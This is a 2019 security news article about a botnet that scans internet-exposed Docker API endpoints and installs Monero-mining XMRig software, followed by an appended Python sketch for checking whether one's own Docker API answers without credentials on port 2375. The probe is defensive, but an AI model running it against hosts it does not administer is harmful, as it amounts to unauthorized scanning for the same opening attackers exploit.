UPDATED 20:45 EDT / NOVEMBER 27 2019

SECURITY

Vulnerable Docker instances targeted in cryptocurrency mining campaign

Unknown hackers have launched a new campaign that’s actively scanning for vulnerable Docker application container instances to inject cryptomining code.

Discovered by cybersecurity firm Bad Packets LLC, the group is actively scanning for vulnerable Docker instances that have application programming interface endpoints exposed to the internet.

Although efforts by hackers to find and hijack servers are common, this case is specifically notable because of the volume: Those behind it are scanning more than 59,000 IP networks in an attempt to identify vulnerable instances.

“What set this campaign apart was the large uptick of scanning activity,” Troy Mursch, chief research officer and co-founder of Bad Packets, told ZDNet Tuesday. “This alone warranted further investigation to find out what this botnet was up to. This isn’t your average script kiddie exploit attempt. There was a moderate level of effort put into this campaign, and we haven’t fully analyzed every single thing it does as of yet.”

Once a vulnerable Docker instance is located, a command is run to install the XMRig script that hijacks the server to mine for the Monero cryptocurrency.

Monero has long been the favorite cryptocurrency of hackers. Unlike bitcoin and other cryptocurrencies that use a public blockchain, thus making transactions traceable, Monero is private and difficult if not impossible to trace.

This isn’t the first time Docker has been targeted by those attempting to install cryptomining code. In March, unpatched Docker hosts were targeted through a runC vulnerability, with access also gained where Docker’s remote API was open and public, and Monero mining software was installed.

And last month, a cryptojacking worm dubbed “Graboid” was spotted in the wild after spreading to more than 2,000 unsecured Docker hosts. If this sounds repetitive, it should. The hackers exploited Docker vulnerabilities to install Monero cryptomining code.

In this new campaign, as of Tuesday the miners may have been actively scanning but had yet to profit much. Mursch estimates that they have managed to mine only 14.82 Monero (XMR), worth about $832.

Users running Docker instances are being advised to check if they’re exposing their API endpoints and, if they are, to close the ports and terminate unrecognized running containers.
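One way to carry out that check on a host you administer, as an added example that is not from Bad Packets or Docker: the Python sketch below asks the Docker Engine API for its running containers without credentials and flags any whose image is not on an allowlist. The port (2375, the conventional unencrypted API port), the allowlist and the sample response are assumptions made for illustration.

```python
import http.client
import json

PLAIN_API_PORT = 2375  # conventional unencrypted Docker Engine API port (assumed)

def fetch_containers_unauthenticated(host, port=PLAIN_API_PORT, timeout=3.0):
    """Return the /containers/json body if the API answers with no credentials, else None."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", "/containers/json")  # lists running containers
        resp = conn.getresponse()
        body = resp.read().decode("utf-8", "replace")
        return body if resp.status == 200 else None
    except (OSError, http.client.HTTPException):
        return None  # closed, filtered, or not speaking plain HTTP
    finally:
        conn.close()

def unrecognized_containers(containers_json, allowed_images):
    """Return (short id, image, command) for containers whose image is not allowlisted."""
    flagged = []
    for c in json.loads(containers_json):
        image = c.get("Image", "")
        if image not in allowed_images:
            flagged.append((c.get("Id", "")[:12], image, c.get("Command", "")))
    return flagged

# Constructed sample response, shaped like the Engine API's container list.
SAMPLE_RESPONSE = json.dumps([
    {"Id": "a1" * 32, "Image": "nginx:1.17", "Command": "nginx -g 'daemon off;'"},
    {"Id": "b2" * 32, "Image": "example/unknown:latest", "Command": "/bin/sh -c ./run.sh"},
])

if __name__ == "__main__":
    allowed = {"nginx:1.17"}  # hypothetical allowlist for this host
    body = fetch_containers_unauthenticated("127.0.0.1")
    if body is None:
        print("API not reachable without credentials on port", PLAIN_API_PORT)
    else:
        print("EXPOSED: API answered without credentials; restrict or close the port")
        for cid, image, cmd in unrecognized_containers(body, allowed):
            print(f"unrecognized container {cid} image={image} cmd={cmd!r}")
```

Checking 127.0.0.1 only shows that the daemon is listening on TCP; run the same check against the host's public address from an outside network to confirm whether the endpoint is reachable from the internet.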
